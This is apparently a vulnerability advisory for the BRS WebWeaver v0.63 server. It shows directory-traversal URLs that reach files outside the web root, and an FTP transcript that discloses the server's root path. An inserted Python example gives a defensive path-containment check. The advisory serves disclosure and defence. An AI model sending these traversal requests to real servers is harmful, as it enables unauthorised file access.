COMMAND

    WebWeaver

SYSTEMS AFFECTED

    BRS WebWeaver v0.63

PROBLEM

    Joe Testa found the following.  BRS WebWeaver v0.63 is a combined
    ftp and web server.  Vulnerabilities exist in the web server which
    allow remote users to break out of the web root using relative
    paths (i.e. '..', '...').  In addition, the ftp server can be made
    to disclose the physical path of the ftp root.

    The following URLs demonstrate the problem with the web server:

        http://localhost/syshelp/../[any file outside the web root]
        http://localhost/sysimages/../[any file outside the web root]
        http://localhost/scripts/../[any file outside the web root]
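    The following is an added example, not code from the advisory or from
    WebWeaver, of the containment check a server must apply when it maps an
    aliased request ('syshelp', 'sysimages', 'scripts') to a directory.  The
    directory names are assumed.  It also shows why a plain
    normalise-then-compare check is not enough here: normpath collapses
    '..' but leaves '...' untouched, so the dot-only segments the advisory
    reports have to be rejected explicitly.

```python
import posixpath
from urllib.parse import unquote

# Constructed example: web root and alias directories are assumed names
# modelled on the aliases the advisory mentions.
WEB_ROOT = "/srv/webweaver/wwwroot"
ALIASES = {
    "syshelp": "/srv/webweaver/help",
    "sysimages": "/srv/webweaver/images",
    "scripts": "/srv/webweaver/cgi",
}


def resolve_request(url_path):
    """Map a request path to a filesystem path.

    Returns None when the request would leave the directory its alias
    (or the web root) maps to.
    """
    # Decode percent-encoding first so '%2e%2e' is seen as '..', and treat
    # backslashes as separators since the affected server runs on Windows.
    path = unquote(url_path).replace("\\", "/")
    segments = [s for s in path.split("/") if s]

    # Reject any segment made only of two or more dots ('..', '...', ...).
    # posixpath.normpath only collapses '..'; '...' would survive
    # normalisation and pass a naive prefix check, yet the advisory reports
    # it is honoured as traversal by the underlying platform.
    if any(len(seg) >= 2 and set(seg) == {"."} for seg in segments):
        return None

    base = WEB_ROOT
    if segments and segments[0] in ALIASES:
        base = ALIASES[segments[0]]
        segments = segments[1:]

    candidate = posixpath.normpath(posixpath.join(base, *segments))

    # Containment check: the resolved path must be the mapped directory
    # itself or something strictly beneath it.
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    return candidate
```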

    The  following  is  an  illustration  of  the problem with the ftp
    server:

        >ftp localhost
        Connected to xxxxxxxxxxxx.rh.rit.edu.
        220 BRS WebWeaver FTP Server ready.
        User (xxxxxxxxxxxx.rh.rit.edu:(none)): jdog
        331 Password required for jdog.
        Password:
        230 User jdog logged in.
        ftp> cd *
        250 CWD command successful. "/*/" is current directory.
        ftp> ls
        200 Port command successful.
        150 Opening data connection for directory list.
        c:\windows\desktop\*\*.* not found
        226 File sent ok
        ftp: 36 bytes received in 0.06Seconds 0.60Kbytes/sec.
        ftp>

SOLUTION

    The web server root traversal vulnerabilities can be prevented by
    removing all user-defined aliases (i.e. 'syshelp', 'sysimages') as
    well as the ISAPI/CGI alias (i.e. 'scripts').  There is no solution
    for the ftp root disclosure vulnerability.